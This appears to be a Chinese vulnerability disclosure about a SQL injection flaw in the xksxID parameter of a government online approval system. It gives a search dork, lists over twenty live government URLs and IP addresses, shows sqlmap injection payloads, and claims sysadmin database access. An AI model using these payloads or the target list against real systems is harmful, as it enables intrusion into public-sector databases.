某政务系统一处通用SQL注入漏洞（附众多政务案例）

### 简要描述： 某政务系统一处通用SQL注入漏洞（附众多政务案例） ### 详细说明： 系统开发厂商：邯郸市连邦软件发展有限公司 系统架构：ASPX+MSSQL 漏洞文件：workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= xksxID参数过滤存在问题，导致注入 关键字：inurl：workplate 部分政府案例： 日照市网上审批系统 http://www.rzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 保定市网上审批系统 http://www.bdxzfw.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 磁县网上审批系统 http://www.cxxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 魏县网上审批系统 http://wxxz.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 邯郸县网上审批系统 http://www.hdxzwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 南郊区网上审批系统 http://xz.njqsp.com:8001/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 城区网上审批系统 http://211.142.37.152:81/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 左云县网上审批系统 http://211.142.37.152:88/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 天镇县网上审批系统 http://211.142.37.154:83/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 广灵县网上审批系统 http://211.142.37.152:83/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 新荣区网上审批系统 http://183.203.128.238:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 矿区网上审批系统 http://211.142.41.114:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 涉县网上审批系统 http://www.hbsxxzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 临漳县网上审批系统 http://www.lzxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 安新县网上审批系统 http://www.axxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 高阳县网上审批系统 http://gyxzfw.net/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 长子县网上审批系统 http://60.220.253.153:81/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 屯留县网上审批系统 http://60.220.240.7/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 浑源县网上审批系统 http://211.142.37.152:85/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 邱县网上审批系统 www.qxxzfwzx.com/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 南郊区网上审批系统 http://xz.njqsp.com:8001/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 大同县网上审批系统 http://211.142.37.152:82/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID= 等等 ### 漏洞证明： 漏洞验证： http://www.rzfwzx.gov.cn/workplate/xzsp/gxxt/tjfx/spsl.aspx?xksxID=为例： ``` Place: GET Parameter: xksxID Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: xksxID=928 AND 8078=8078&baseorg=209 Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) Payload: xksxID=928 AND 1288 IN ((CHAR(58) CHAR(99) CHAR(119) CHAR(122) CHAR (58) (SELECT (CASE WHEN (1288=1288) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) C HAR(98) CHAR(115) CHAR(109) CHAR(58)))&baseorg=209 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: xksxID=928 AND 2613=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sys users AS sys7)&baseorg=209 Type: inline query Title: Microsoft SQL Server/Sybase inline queries Payload: xksxID=(SELECT CHAR(58) CHAR(99) CHAR(119) CHAR(122) CHAR(58) (SELE CT (CASE WHEN (4478=4478) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(98) CH AR(115) CHAR(109) CHAR(58))&baseorg=209 --- ``` [<img src="https://images.seebug.org/upload/201506/0921104000627ff11c79d41d5620a414b7432757.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/0921104000627ff11c79d41d5620a414b7432757.png) SA权限： [<img src="https://images.seebug.org/upload/201506/09211232936bc439c7c3de59909e35166bebd788.png" alt="11.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201506/09211232936bc439c7c3de59909e35166bebd788.png) 其他如上！